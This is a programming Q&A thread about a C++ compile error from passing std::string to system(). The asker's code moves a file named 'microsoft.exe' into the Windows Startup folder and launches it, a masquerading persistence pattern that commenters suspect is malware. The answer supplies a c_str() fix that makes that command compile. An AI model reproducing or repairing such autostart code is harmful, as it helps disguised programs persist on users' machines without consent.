# how to fix "NO match found for 'system(string)

Tags: c++

I get the error E2285 no match found for "system(string)
please help me.
the code is down below
I can't get why it isn't working, for this usuallly works with cout<<

```
#include <stdio.h>  /* defines FILENAME_MAX */
using namespace std;
#define WINDOWS  /* uncomment this line to use it for windows.*/
#include <direct.h>
#define GetCurrentDir _getcwd
#include <iostream>


string GetCurrentWorkingDir( void ) {
  char buff[FILENAME_MAX];
  GetCurrentDir( buff, FILENAME_MAX );
  std::string current_working_dir(buff);
  return current_working_dir;
}

int main(){
  string dir;
  dir = GetCurrentWorkingDir();
  system("move "+ dir + "\\microsoft.exe C:\\programdata\\microsoft\\windows\\start menu\\programs\\startup");
  system("microsoft.html");
  system("cd\\");
  system("cd microsoft.exe C:\\programdata\\microsoft\\windows\\start menu\\programs\\startup");
  system("microsoft.exe");

  return 1;
}
```

Comment: you want `std::system` from the `<cstdlib>` ?

Comment: `system` takes `const char*` as argument, not `std::string`.

Comment: the sequence "move " + dir + "'\..."  --> string

Comment: `microsoft.exe`? Suspicious...

Comment: If only all malware authors were this incompetent...

Comment: This question was substantially modified after a good answer was given below, and I have thus rolled back to the earlier version. If it is tightly related to this question you could add an **Update** section and put the new code underneath, but I wonder whether in this case, it merits a new question. We generally discourage more than one question in the same post, as it makes it harder to judge answers supplied.

Comment: Please try to refrain from adding "help please" to questions, especially in titles and especially in shouty case. This will generally be interpreted as begging, and that is not appropriate on a site where a technical writing is preferred.

Answer (score 1):

`std::system` takes `const char*` not `std::string`, which is obvious from the [warnings](https://gcc.godbolt.org/z/Se5W_V).

```
system("move "+ dir + "\\microsoft.exe C:\\programdata\\microsoft\\windows\\start menu\\programs\\startup")
```

Here, the result of the sum is `std::string`. Collect the argument into one single `std::string`, then use `std::string::c_str` method to call `std::system`.

```
auto arg = "move "+ dir + "\\microsoft.exe C:\\programdata\\microsoft\\windows\\start menu\\programs\\startup";
std::system(arg.c_str());
```

Besides that, you have many errors, like you did not include `<string>` header, you return `1` from `main` instead of `0`. [You use `using namespace std;`](https://stackoverflow.com/q/1452721/10147399), you use C versions of the standard headers (`<stdio.h>` instead of `<cstdio>`), you never included `<cstdlib>` which defines `std::system` and so on.